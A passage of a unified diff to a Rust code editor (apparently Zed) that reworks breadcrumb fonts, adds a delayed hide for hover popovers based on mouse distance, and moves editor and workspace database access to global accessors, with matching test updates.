if !phase.bubble() {
return;
}
if event.button == MouseButton::Left && hitbox.is_hovered(window) {
+ let point_for_position =
+ position_map.point_for_position_on_line(event.position, row, &line_layout);
+
editor.update(cx, |editor, cx| {
+ let snapshot = editor.snapshot(window, cx);
+ let anchor = snapshot
+ .display_snapshot
+ .display_point_to_anchor(point_for_position.previous_valid, Bias::Left);
editor.change_selections(
SelectionEffects::scroll(Autoscroll::top_relative(line_index)),
window,
cx,
- |selections| selections.select_ranges([target_anchor..target_anchor]),
+ |selections| selections.select_ranges([anchor..anchor]),
);
cx.stop_propagation();
});
@@ -7911,7 +7915,8 @@ impl EditorElement {
}
pub fn render_breadcrumb_text(
- mut segments: Vec<BreadcrumbText>,
+ mut segments: Vec<HighlightedText>,
+ breadcrumb_font: Option<Font>,
prefix: Option<gpui::AnyElement>,
active_item: &dyn ItemHandle,
multibuffer_header: bool,
@@ -7931,17 +7936,16 @@ pub fn render_breadcrumb_text(
if suffix_start_ix > prefix_end_ix {
segments.splice(
prefix_end_ix..suffix_start_ix,
- Some(BreadcrumbText {
+ Some(HighlightedText {
text: "⋯".into(),
- highlights: None,
- font: None,
+ highlights: vec![],
}),
);
}
let highlighted_segments = segments.into_iter().enumerate().map(|(index, segment)| {
let mut text_style = window.text_style();
- if let Some(ref font) = segment.font {
+ if let Some(font) = &breadcrumb_font {
text_style.font_family = font.family.clone();
text_style.font_features = font.features.clone();
text_style.font_style = font.style;
@@ -7958,7 +7962,7 @@ pub fn render_breadcrumb_text(
}
StyledText::new(segment.text.replace('\n', " "))
- .with_default_highlights(&text_style, segment.highlights.unwrap_or_default())
+ .with_default_highlights(&text_style, segment.highlights)
.into_any()
});
@@ -8068,13 +8072,13 @@ pub fn render_breadcrumb_text(
}
fn apply_dirty_filename_style(
- segment: &BreadcrumbText,
+ segment: &HighlightedText,
text_style: &gpui::TextStyle,
cx: &App,
) -> Option<gpui::AnyElement> {
let text = segment.text.replace('\n', " ");
- let filename_position = std::path::Path::new(&segment.text)
+ let filename_position = std::path::Path::new(segment.text.as_ref())
.file_name()
.and_then(|f| {
let filename_str = f.to_string_lossy();
@@ -8444,8 +8448,12 @@ pub(crate) fn render_buffer_header(
el.child(Icon::new(IconName::FileLock).color(Color::Muted))
})
.when_some(breadcrumbs, |then, breadcrumbs| {
+ let font = theme::ThemeSettings::get_global(cx)
+ .buffer_font
+ .clone();
then.child(render_breadcrumb_text(
breadcrumbs,
+ Some(font),
None,
editor_handle,
true,
@@ -8609,21 +8617,6 @@ pub(crate) fn render_buffer_header(
})
}
-pub struct AcceptEditPredictionBinding(pub(crate) Option<gpui::KeyBinding>);
-
-impl AcceptEditPredictionBinding {
- pub fn keystroke(&self) -> Option<&KeybindingKeystroke> {
- if let Some(binding) = self.0.as_ref() {
- match &binding.keystrokes() {
- [keystroke, ..] => Some(keystroke),
- _ => None,
- }
- } else {
- None
- }
- }
-}
-
fn prepaint_gutter_button(
mut button: AnyElement,
row: DisplayRow,
@@ -9538,7 +9531,7 @@ impl EditorRequestLayoutState {
}
}
- fn can_prepaint(&self) -> bool {
+ fn has_remaining_prepaint_depth(&self) -> bool {
self.prepaint_depth.get() < Self::MAX_PREPAINT_DEPTH
}
}
@@ -10251,29 +10244,21 @@ impl Element for EditorElement {
}
})
});
- if new_renderer_widths.is_some_and(|new_renderer_widths| {
- self.editor.update(cx, |editor, cx| {
- editor.update_renderer_widths(new_renderer_widths, cx)
- })
- }) {
- // If the fold widths have changed, we need to prepaint
- // the element again to account for any changes in
- // wrapping.
- if request_layout.can_prepaint() {
- return self.prepaint(
- None,
- _inspector_id,
- bounds,
- request_layout,
- window,
- cx,
- );
- } else {
- debug_panic!(concat!(
- "skipping recursive prepaint at max depth. ",
- "renderer widths may be stale."
- ));
- }
+ let renderer_widths_changed = request_layout.has_remaining_prepaint_depth()
+ && new_renderer_widths.is_some_and(|new_renderer_widths| {
+ self.editor.update(cx, |editor, cx| {
+ editor.update_renderer_widths(new_renderer_widths, cx)
+ })
+ });
+ if renderer_widths_changed {
+ return self.prepaint(
+ None,
+ _inspector_id,
+ bounds,
+ request_layout,
+ window,
+ cx,
+ );
}
let longest_line_blame_width = self
@@ -10389,14 +10374,14 @@ impl Element for EditorElement {
resized_blocks,
} = blocks;
if let Some(resized_blocks) = resized_blocks {
- self.editor.update(cx, |editor, cx| {
- editor.resize_blocks(
- resized_blocks,
- autoscroll_request.map(|(autoscroll, _)| autoscroll),
- cx,
- )
- });
- if request_layout.can_prepaint() {
+ if request_layout.has_remaining_prepaint_depth() {
+ self.editor.update(cx, |editor, cx| {
+ editor.resize_blocks(
+ resized_blocks,
+ autoscroll_request.map(|(autoscroll, _)| autoscroll),
+ cx,
+ )
+ });
return self.prepaint(
None,
_inspector_id,
@@ -10406,10 +10391,10 @@ impl Element for EditorElement {
cx,
);
} else {
- debug_panic!(concat!(
- "skipping recursive prepaint at max depth. ",
- "block layout may be stale."
- ));
+ debug_panic!(
+ "dropping block resize because prepaint depth \
+ limit was reached"
+ );
}
}
@@ -11284,11 +11269,10 @@ struct StickyHeaders {
struct StickyHeaderLine {
row: DisplayRow,
offset: Pixels,
- line: LineWithInvisibles,
+ line: Rc<LineWithInvisibles>,
line_number: Option<ShapedLine>,
elements: SmallVec<[AnyElement; 1]>,
available_text_width: Pixels,
- target_anchor: Anchor,
hitbox: Hitbox,
}
@@ -11346,7 +11330,7 @@ impl StickyHeaders {
},
);
- window.set_cursor_style(CursorStyle::PointingHand, &line.hitbox);
+ window.set_cursor_style(CursorStyle::IBeam, &line.hitbox);
}
}
}
@@ -11357,7 +11341,6 @@ impl StickyHeaderLine {
offset: Pixels,
mut line: LineWithInvisibles,
line_number: Option<ShapedLine>,
- target_anchor: Anchor,
line_height: Pixels,
scroll_pixel_position: gpui::Point<ScrollPixelOffset>,
content_origin: gpui::Point<Pixels>,
@@ -11387,11 +11370,10 @@ impl StickyHeaderLine {
Self {
row,
offset,
- line,
+ line: Rc::new(line),
line_number,
elements,
available_text_width,
- target_anchor,
hitbox: window.insert_hitbox(hitbox_bounds, HitboxBehavior::BlockMouseExceptScroll),
}
}
@@ -11973,6 +11955,41 @@ impl PositionMap {
column_overshoot_after_line_end,
}
}
+
+ fn point_for_position_on_line(
+ &self,
+ position: gpui::Point<Pixels>,
+ row: DisplayRow,
+ line: &LineWithInvisibles,
+ ) -> PointForPosition {
+ let text_bounds = self.text_hitbox.bounds;
+ let scroll_position = self.snapshot.scroll_position();
+ let position = position - text_bounds.origin;
+ let x = position.x + (scroll_position.x as f32 * self.em_layout_width);
+
+ let alignment_offset = line.alignment_offset(self.text_align, self.content_width);
+ let x_relative_to_text = x - alignment_offset;
+ let (column, x_overshoot_after_line_end) =
+ if let Some(ix) = line.index_for_x(x_relative_to_text) {
+ (ix as u32, px(0.))
+ } else {
+ (line.len as u32, px(0.).max(x_relative_to_text - line.width))
+ };
+
+ let mut exact_unclipped = DisplayPoint::new(row, column);
+ let previous_valid = self.snapshot.clip_point(exact_unclipped, Bias::Left);
+ let next_valid = self.snapshot.clip_point(exact_unclipped, Bias::Right);
+
+ let column_overshoot_after_line_end =
+ (x_overshoot_after_line_end / self.em_layout_width) as u32;
+ *exact_unclipped.column_mut() += column_overshoot_after_line_end;
+ PointForPosition {
+ previous_valid,
+ next_valid,
+ exact_unclipped,
+ column_overshoot_after_line_end,
+ }
+ }
}
pub(crate) struct BlockLayout {
@@ -12309,7 +12326,6 @@ impl HighlightedRange {
}
pub(crate) struct StickyHeader {
- pub item: language::OutlineItem<Anchor>,
pub sticky_row: DisplayRow,
pub start_point: Point,
pub offset: ScrollOffset,
@@ -13,7 +13,7 @@ impl Editor {
_window: &Window,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() || !self.use_document_folding_ranges {
+ if !self.lsp_data_enabled() || !self.use_document_folding_ranges {
return;
}
let Some(project) = self.project.clone() else {
@@ -4,7 +4,7 @@ use crate::{
HighlightKey, Navigated, PointForPosition, SelectPhase,
editor_settings::GoToDefinitionFallback, scroll::ScrollAmount,
};
-use gpui::{App, AsyncWindowContext, Context, Entity, Modifiers, Task, Window, px};
+use gpui::{App, AsyncWindowContext, Context, Entity, Modifiers, Pixels, Task, Window, px};
use language::{Bias, ToOffset};
use linkify::{LinkFinder, LinkKind};
use lsp::LanguageServerId;
@@ -113,6 +113,7 @@ impl Editor {
pub(crate) fn update_hovered_link(
&mut self,
point_for_position: PointForPosition,
+ mouse_position: Option<gpui::Point<Pixels>>,
snapshot: &EditorSnapshot,
modifiers: Modifiers,
window: &mut Window,
@@ -138,6 +139,7 @@ impl Editor {
self.update_inlay_link_and_hover_points(
snapshot,
point_for_position,
+ mouse_position,
hovered_link_modifier,
modifiers.shift,
window,
@@ -8,10 +8,10 @@ use crate::{
};
use anyhow::Context as _;
use gpui::{
- AnyElement, AsyncWindowContext, Context, Entity, Focusable as _, FontWeight, Hsla,
+ AnyElement, App, AsyncWindowContext, Bounds, Context, Entity, Focusable as _, FontWeight, Hsla,
InteractiveElement, IntoElement, MouseButton, ParentElement, Pixels, ScrollHandle, Size,
StatefulInteractiveElement, StyleRefinement, Styled, Subscription, Task, TextStyleRefinement,
- Window, div, px,
+ Window, canvas, div, px,
};
use itertools::Itertools;
use language::{DiagnosticEntry, Language, LanguageRegistry};
@@ -20,7 +20,10 @@ use markdown::{Markdown, MarkdownElement, MarkdownStyle};
use multi_buffer::{MultiBufferOffset, ToOffset, ToPoint};
use project::{HoverBlock, HoverBlockKind, InlayHintLabelPart};
use settings::Settings;
-use std::{borrow::Cow, cell::RefCell};
+use std::{
+ borrow::Cow,
+ cell::{Cell, RefCell},
+};
use std::{ops::Range, sync::Arc, time::Duration};
use std::{path::PathBuf, rc::Rc};
use theme::ThemeSettings;
@@ -45,6 +48,7 @@ pub fn hover(editor: &mut Editor, _: &Hover, window: &mut Window, cx: &mut Conte
pub fn hover_at(
editor: &mut Editor,
anchor: Option<Anchor>,
+ mouse_position: Option<gpui::Point<Pixels>>,
window: &mut Window,
cx: &mut Context<Editor>,
) {
@@ -52,10 +56,32 @@ pub fn hover_at(
if show_keyboard_hover(editor, window, cx) {
return;
}
+
if let Some(anchor) = anchor {
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
show_hover(editor, anchor, false, window, cx);
} else {
- hide_hover(editor, cx);
+ let mut getting_closer = false;
+ if let Some(mouse_position) = mouse_position {
+ getting_closer = editor.hover_state.is_mouse_getting_closer(mouse_position);
+ }
+
+ // If we are moving away and a timer is already running, just let it count down.
+ if !getting_closer && editor.hover_state.hiding_delay_task.is_some() {
+ return;
+ }
+
+ // If we are moving closer, or if no timer is running at all, start/restart the 300ms timer.
+ let delay = Duration::from_millis(300u64);
+ let task = cx.spawn(async move |this, cx| {
+ cx.background_executor().timer(delay).await;
+ this.update(cx, |editor, cx| {
+ hide_hover(editor, cx);
+ })
+ .ok();
+ });
+ editor.hover_state.hiding_delay_task = Some(task);
}
}
}
@@ -156,6 +182,9 @@ pub fn hover_at_inlay(
let hover_popover_delay = EditorSettings::get_global(cx).hover_popover_delay.0;
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
+
let task = cx.spawn_in(window, async move |this, cx| {
async move {
cx.background_executor()
@@ -187,6 +216,7 @@ pub fn hover_at_inlay(
scroll_handle,
keyboard_grace: Rc::new(RefCell::new(false)),
anchor: None,
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
};
@@ -216,6 +246,8 @@ pub fn hide_hover(editor: &mut Editor, cx: &mut Context<Editor>) -> bool {
editor.hover_state.info_task = None;
editor.hover_state.triggered_from = None;
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
editor.clear_background_highlights(HighlightKey::HoverState, cx);
@@ -254,6 +286,9 @@ fn show_hover(
.map(|project| project.read(cx).languages().clone());
let provider = editor.semantics_provider.clone()?;
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
+
if !ignore_timeout {
if same_info_hover(editor, &snapshot, anchor)
|| same_diagnostic_hover(editor, &snapshot, anchor)
@@ -398,6 +433,7 @@ fn show_hover(
background_color,
keyboard_grace: Rc::new(RefCell::new(ignore_timeout)),
anchor,
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
})
} else {
@@ -466,6 +502,7 @@ fn show_hover(
scroll_handle,
keyboard_grace: Rc::new(RefCell::new(ignore_timeout)),
anchor: Some(anchor),
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
})
}
@@ -507,6 +544,7 @@ fn show_hover(
scroll_handle,
keyboard_grace: Rc::new(RefCell::new(ignore_timeout)),
anchor: Some(anchor),
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
});
}
@@ -778,6 +816,8 @@ pub struct HoverState {
pub diagnostic_popover: Option<DiagnosticPopover>,
pub triggered_from: Option<Anchor>,
pub info_task: Option<Task<Option<()>>>,
+ pub closest_mouse_distance: Option<Pixels>,
+ pub hiding_delay_task: Option<Task<()>>,
}
impl HoverState {
@@ -785,6 +825,60 @@ impl HoverState {
!self.info_popovers.is_empty() || self.diagnostic_popover.is_some()
}
+ pub fn is_mouse_getting_closer(&mut self, mouse_position: gpui::Point<Pixels>) -> bool {
+ if !self.visible() {
+ return false;
+ }
+
+ let mut popover_bounds = Vec::new();
+ for info_popover in &self.info_popovers {
+ if let Some(bounds) = info_popover.last_bounds.get() {
+ popover_bounds.push(bounds);
+ }
+ }
+ if let Some(diagnostic_popover) = &self.diagnostic_popover {
+ if let Some(bounds) = diagnostic_popover.last_bounds.get() {
+ popover_bounds.push(bounds);
+ }
+ }
+
+ if popover_bounds.is_empty() {
+ return false;
+ }
+
+ let distance = popover_bounds
+ .iter()
+ .map(|bounds| self.distance_from_point_to_bounds(mouse_position, *bounds))
+ .min_by(|a, b| a.partial_cmp(b).unwrap_or(std::cmp::Ordering::Equal))
+ .unwrap_or(px(f32::MAX));
+
+ if let Some(closest_distance) = self.closest_mouse_distance {
+ if distance > closest_distance + px(4.0) {
+ return false;
+ }
+ }
+
+ self.closest_mouse_distance =
+ Some(distance.min(self.closest_mouse_distance.unwrap_or(distance)));
+ true
+ }
+
+ fn distance_from_point_to_bounds(
+ &self,
+ point: gpui::Point<Pixels>,
+ bounds: Bounds<Pixels>,
+ ) -> Pixels {
+ let center_x = bounds.origin.x + bounds.size.width / 2.;
+ let center_y = bounds.origin.y + bounds.size.height / 2.;
+ let dx: f32 = ((point.x - center_x).abs() - bounds.size.width / 2.)
+ .max(px(0.0))
+ .into();
+ let dy: f32 = ((point.y - center_y).abs() - bounds.size.height / 2.)
+ .max(px(0.0))
+ .into();
+ px((dx.powi(2) + dy.powi(2)).sqrt())
+ }
+
pub(crate) fn render(
&mut self,
snapshot: &EditorSnapshot,
@@ -887,6 +981,7 @@ pub struct InfoPopover {
pub scroll_handle: ScrollHandle,
pub keyboard_grace: Rc<RefCell<bool>>,
pub anchor: Option<Anchor>,
+ pub last_bounds: Rc<Cell<Option<Bounds<Pixels>>>>,
_subscription: Option<Subscription>,
}
@@ -898,13 +993,36 @@ impl InfoPopover {
cx: &mut Context<Editor>,
) -> AnyElement {
let keyboard_grace = Rc::clone(&self.keyboard_grace);
+ let this = cx.entity().downgrade();
+ let bounds_cell = self.last_bounds.clone();
div()
.id("info_popover")
.occlude()
.elevation_2(cx)
+ .child(
+ canvas(
+ {
+ move |bounds, _window, _cx| {
+ bounds_cell.set(Some(bounds));
+ }
+ },
+ |_, _, _, _| {},
+ )
+ .absolute()
+ .size_full(),
+ )
// Prevent a mouse down/move on the popover from being propagated to the editor,
// because that would dismiss the popover.
- .on_mouse_move(|_, _, cx| cx.stop_propagation())
+ .on_mouse_move({
+ move |_, _, cx: &mut App| {
+ this.update(cx, |editor, _| {
+ editor.hover_state.closest_mouse_distance = Some(px(0.0));
+ editor.hover_state.hiding_delay_task = None;
+ })
+ .ok();
+ cx.stop_propagation()
+ }
+ })
.on_mouse_down(MouseButton::Left, move |_, _, cx| {
let mut keyboard_grace = keyboard_grace.borrow_mut();
*keyboard_grace = false;
@@ -957,6 +1075,7 @@ pub struct DiagnosticPopover {
background_color: Hsla,
pub keyboard_grace: Rc<RefCell<bool>>,
pub anchor: Anchor,
+ pub last_bounds: Rc<Cell<Option<Bounds<Pixels>>>>,
_subscription: Subscription,
pub scroll_handle: ScrollHandle,
}
@@ -970,10 +1089,23 @@ impl DiagnosticPopover {
) -> AnyElement {
let keyboard_grace = Rc::clone(&self.keyboard_grace);
let this = cx.entity().downgrade();
+ let bounds_cell = self.last_bounds.clone();
div()
.id("diagnostic")
.occlude()
.elevation_2_borderless(cx)
+ .child(
+ canvas(
+ {
+ move |bounds, _window, _cx| {
+ bounds_cell.set(Some(bounds));
+ }
+ },
+ |_, _, _, _| {},
+ )
+ .absolute()
+ .size_full(),
+ )
// Don't draw the background color if the theme
// allows transparent surfaces.
.when(theme_is_transparent(cx), |this| {
@@ -981,7 +1113,17 @@ impl DiagnosticPopover {
})
// Prevent a mouse move on the popover from being propagated to the editor,
// because that would dismiss the popover.
- .on_mouse_move(|_, _, cx| cx.stop_propagation())
+ .on_mouse_move({
+ let this = this.clone();
+ move |_, _, cx: &mut App| {
+ this.update(cx, |editor, _| {
+ editor.hover_state.closest_mouse_distance = Some(px(0.0));
+ editor.hover_state.hiding_delay_task = None;
+ })
+ .ok();
+ cx.stop_propagation()
+ }
+ })
// Prevent a mouse down on the popover from being propagated to the editor,
// because that would move the cursor.
.on_mouse_down(MouseButton::Left, move |_, _, cx| {
@@ -1151,7 +1293,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
assert!(!cx.editor(|editor, _window, _cx| editor.hover_state.visible()));
@@ -1251,7 +1393,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
cx.background_executor
.advance_clock(Duration::from_millis(get_hover_popover_delay(&cx) + 100));
@@ -1289,7 +1431,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
assert!(!cx.editor(|editor, _window, _cx| editor.hover_state.visible()));
@@ -1343,7 +1485,7 @@ mod tests {
let anchor = snapshot
.buffer_snapshot()
.anchor_before(hover_point.to_offset(&snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx)
+ hover_at(editor, Some(anchor), None, window, cx)
});
cx.background_executor
.advance_clock(Duration::from_millis(get_hover_popover_delay(&cx) + 100));
@@ -1752,6 +1894,7 @@ mod tests {
editor.update_inlay_link_and_hover_points(
&editor.snapshot(window, cx),
new_type_hint_part_hover_position,
+ None,
true,
false,
window,
@@ -1822,6 +1965,7 @@ mod tests {
editor.update_inlay_link_and_hover_points(
&editor.snapshot(window, cx),
new_type_hint_part_hover_position,
+ None,
true,
false,
window,
@@ -1877,6 +2021,7 @@ mod tests {
editor.update_inlay_link_and_hover_points(
&editor.snapshot(window, cx),
struct_hint_part_hover_position,
+ None,
true,
false,
window,
@@ -7,7 +7,7 @@ use std::{
use clock::Global;
use collections::{HashMap, HashSet};
use futures::future::join_all;
-use gpui::{App, Entity, Task};
+use gpui::{App, Entity, Pixels, Task};
use itertools::Itertools;
use language::{
BufferRow,
@@ -292,7 +292,7 @@ impl Editor {
reason: InlayHintRefreshReason,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() || self.inlay_hints.is_none() {
+ if !self.lsp_data_enabled() || self.inlay_hints.is_none() {
return;
}
let Some(semantics_provider) = self.semantics_provider() else {
@@ -569,6 +569,7 @@ impl Editor {
&mut self,
snapshot: &EditorSnapshot,
point_for_position: PointForPosition,
+ mouse_position: Option<gpui::Point<Pixels>>,
secondary_held: bool,
shift_held: bool,
window: &mut Window,
@@ -748,7 +749,7 @@ impl Editor {
self.hide_hovered_link(cx)
}
if !hover_updated {
- hover_popover::hover_at(self, None, window, cx);
+ hover_popover::hover_at(self, None, mouse_position, window, cx);
}
}
@@ -4,7 +4,7 @@ use crate::{
NavigationData, ReportEditorEvent, SelectionEffects, ToPoint as _,
display_map::HighlightKey,
editor_settings::SeedQuerySetting,
- persistence::{DB, SerializedEditor},
+ persistence::{EditorDb, SerializedEditor},
scroll::{ScrollAnchor, ScrollOffset},
};
use anyhow::{Context as _, Result, anyhow};
@@ -14,12 +14,12 @@ use fs::MTime;
use futures::future::try_join_all;
use git::status::GitSummary;
use gpui::{
- AnyElement, App, AsyncWindowContext, Context, Entity, EntityId, EventEmitter, IntoElement,
- ParentElement, Pixels, SharedString, Styled, Task, WeakEntity, Window, point,
+ AnyElement, App, AsyncWindowContext, Context, Entity, EntityId, EventEmitter, Font,
+ IntoElement, ParentElement, Pixels, SharedString, Styled, Task, WeakEntity, Window, point,
};
use language::{
- Bias, Buffer, BufferRow, CharKind, CharScopeContext, LocalFile, Point, SelectionGoal,
- proto::serialize_anchor as serialize_text_anchor,
+ Bias, Buffer, BufferRow, CharKind, CharScopeContext, HighlightedText, LocalFile, Point,
+ SelectionGoal, proto::serialize_anchor as serialize_text_anchor,
};
use lsp::DiagnosticSeverity;
use multi_buffer::MultiBufferOffset;
@@ -41,6 +41,7 @@ use std::{
use text::{BufferId, BufferSnapshot, Selection};
use ui::{IconDecorationKind, prelude::*};
use util::{ResultExt, TryFutureExt, paths::PathExt};
+use workspace::item::{Dedup, ItemSettings, SerializableItem, TabContentParams};
use workspace::{
CollaboratorId, ItemId, ItemNavHistory, ToolbarItemLocation, ViewId, Workspace, WorkspaceId,
invalid_item_view::InvalidItemView,
@@ -51,12 +52,8 @@ use workspace::{
},
};
use workspace::{
- OpenOptions,
- item::{Dedup, ItemSettings, SerializableItem, TabContentParams},
-};
-use workspace::{
- OpenVisible, Pane, WorkspaceSettings,
- item::{BreadcrumbText, FollowEvent, ProjectItemKind},
+ Pane, WorkspaceSettings,
+ item::{FollowEvent, ProjectItemKind},
searchable::SearchOptions,
};
use zed_actions::preview::{
@@ -981,9 +978,10 @@ impl Item for Editor {
}
// In a non-singleton case, the breadcrumbs are actually shown on sticky file headers of the multibuffer.
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
if self.buffer.read(cx).is_singleton() {
- self.breadcrumbs_inner(cx)
+ let font = theme::ThemeSettings::get_global(cx).buffer_font.clone();
+ Some((self.breadcrumbs_inner(cx)?, Some(font)))
} else {
None
}
@@ -1137,18 +1135,24 @@ impl SerializableItem for Editor {
_window: &mut Window,
cx: &mut App,
) -> Task<Result<()>> {
- workspace::delete_unloaded_items(alive_items, workspace_id, "editors", &DB, cx)
+ workspace::delete_unloaded_items(
+ alive_items,
+ workspace_id,
+ "editors",
+ &EditorDb::global(cx),
+ cx,
+ )
}
fn deserialize(
project: Entity<Project>,
- workspace: WeakEntity<Workspace>,
+ _workspace: WeakEntity<Workspace>,
workspace_id: workspace::WorkspaceId,
item_id: ItemId,
window: &mut Window,
cx: &mut App,
) -> Task<Result<Entity<Self>>> {
- let serialized_editor = match DB
+ let serialized_editor = match EditorDb::global(cx)
.get_serialized_editor(item_id, workspace_id)
.context("Failed to query editor state")
{
@@ -1266,42 +1270,33 @@ impl SerializableItem for Editor {
})
}),
None => {
- // File is not in any worktree (e.g., opened as a standalone file)
- // We need to open it via workspace and then restore dirty contents
+ // File is not in any worktree (e.g., opened as a standalone file).
+ // Open the buffer directly via the project rather than through
+ // workspace.open_abs_path(), which has the side effect of adding
+ // the item to a pane. The caller (deserialize_to) will add the
+ // returned item to the correct pane.
window.spawn(cx, async move |cx| {
- let open_by_abs_path =
- workspace.update_in(cx, |workspace, window, cx| {
- workspace.open_abs_path(
- abs_path.clone(),
- OpenOptions {
- visible: Some(OpenVisible::None),
- ..Default::default()
- },
- window,
- cx,
- )
+ let buffer = project
+ .update(cx, |project, cx| project.open_local_buffer(&abs_path, cx))
+ .await
+ .with_context(|| {
+ format!("Failed to open buffer for {abs_path:?}")
})?;
- let editor =
- open_by_abs_path.await?.downcast::<Editor>().with_context(
- || format!("path {abs_path:?} cannot be opened as an Editor"),
- )?;
if let Some(contents) = contents {
- editor.update_in(cx, |editor, _window, cx| {
- if let Some(buffer) = editor.buffer().read(cx).as_singleton() {
- buffer.update(cx, |buffer, cx| {
- restore_serialized_buffer_contents(
- buffer, contents, mtime, cx,
- );
- });
- }
- })?;
+ buffer.update(cx, |buffer, cx| {
+ restore_serialized_buffer_contents(buffer, contents, mtime, cx);
+ });
}
- editor.update_in(cx, |editor, window, cx| {
- editor.read_metadata_from_db(item_id, workspace_id, window, cx);
- })?;
- Ok(editor)
+ cx.update(|window, cx| {
+ cx.new(|cx| {
+ let mut editor =
+ Editor::for_buffer(buffer, Some(project), window, cx);
+ editor.read_metadata_from_db(item_id, workspace_id, window, cx);
+ editor
+ })
+ })
})
}
}
@@ -1372,6 +1367,7 @@ impl SerializableItem for Editor {
let snapshot = buffer.read(cx).snapshot();
+ let db = EditorDb::global(cx);
Some(cx.spawn_in(window, async move |_this, cx| {
cx.background_spawn(async move {
let (contents, language) = if serialize_dirty_buffers && is_dirty {
@@ -1389,7 +1385,7 @@ impl SerializableItem for Editor {
mtime,
};
log::debug!("Serializing editor {item_id:?} in workspace {workspace_id:?}");
- DB.save_serialized_editor(item_id, workspace_id, editor)
+ db.save_serialized_editor(item_id, workspace_id, editor)
.await
.context("failed to save serialized editor")
})
@@ -1649,14 +1645,9 @@ impl SearchableItem for Editor {
match setting {
SeedQuerySetting::Never => String::new(),
SeedQuerySetting::Selection | SeedQuerySetting::Always if !selection.is_empty() => {
- let text: String = buffer_snapshot
+ buffer_snapshot
.text_for_range(selection.start..selection.end)
- .collect();
- if text.contains('\n') {
- String::new()
- } else {
- text
- }
+ .collect()
}
SeedQuerySetting::Selection => String::new(),
SeedQuerySetting::Always => {
@@ -1971,6 +1962,8 @@ pub fn entry_git_aware_label_color(git_status: GitSummary, ignored: bool, select
let tracked = git_status.index + git_status.worktree;
if git_status.conflict > 0 {
Color::Conflict
+ } else if tracked.deleted > 0 {
+ Color::Deleted
} else if tracked.modified > 0 {
Color::Modified
} else if tracked.added > 0 || git_status.untracked > 0 {
@@ -2066,6 +2059,7 @@ mod tests {
use gpui::{App, VisualTestContext};
use language::TestFile;
use project::FakeFs;
+ use serde_json::json;
use std::path::{Path, PathBuf};
use util::{path, rel_path::RelPath};
@@ -2118,7 +2112,9 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
let item_id = 1234 as ItemId;
let mtime = fs
.metadata(Path::new(path!("/file.rs")))
@@ -2134,7 +2130,8 @@ mod tests {
mtime: Some(mtime),
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor.clone())
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor.clone())
.await
.unwrap();
@@ -2157,8 +2154,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 5678 as ItemId;
let serialized_editor = SerializedEditor {
@@ -2168,7 +2167,8 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2197,8 +2197,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 9012 as ItemId;
let serialized_editor = SerializedEditor {
@@ -2208,7 +2210,8 @@ mod tests {
mtime: None,
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
@@ -2235,8 +2238,10 @@ mod tests {
MultiWorkspace::test_new(project.clone(), window, cx)
});
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx));
+ let editor_db = cx.update(|_, cx| EditorDb::global(cx));
- let workspace_id = workspace::WORKSPACE_DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
let item_id = 9345 as ItemId;
let old_mtime = MTime::from_seconds_and_nanos(0, 50);
@@ -2247,7 +2252,8 @@ mod tests {
mtime: Some(old_mtime),
};
- DB.save_serialized_editor(item_id, workspace_id, serialized_editor)
+ editor_db
+ .save_serialized_editor(item_id, workspace_id, serialized_editor)
.await
.unwrap();
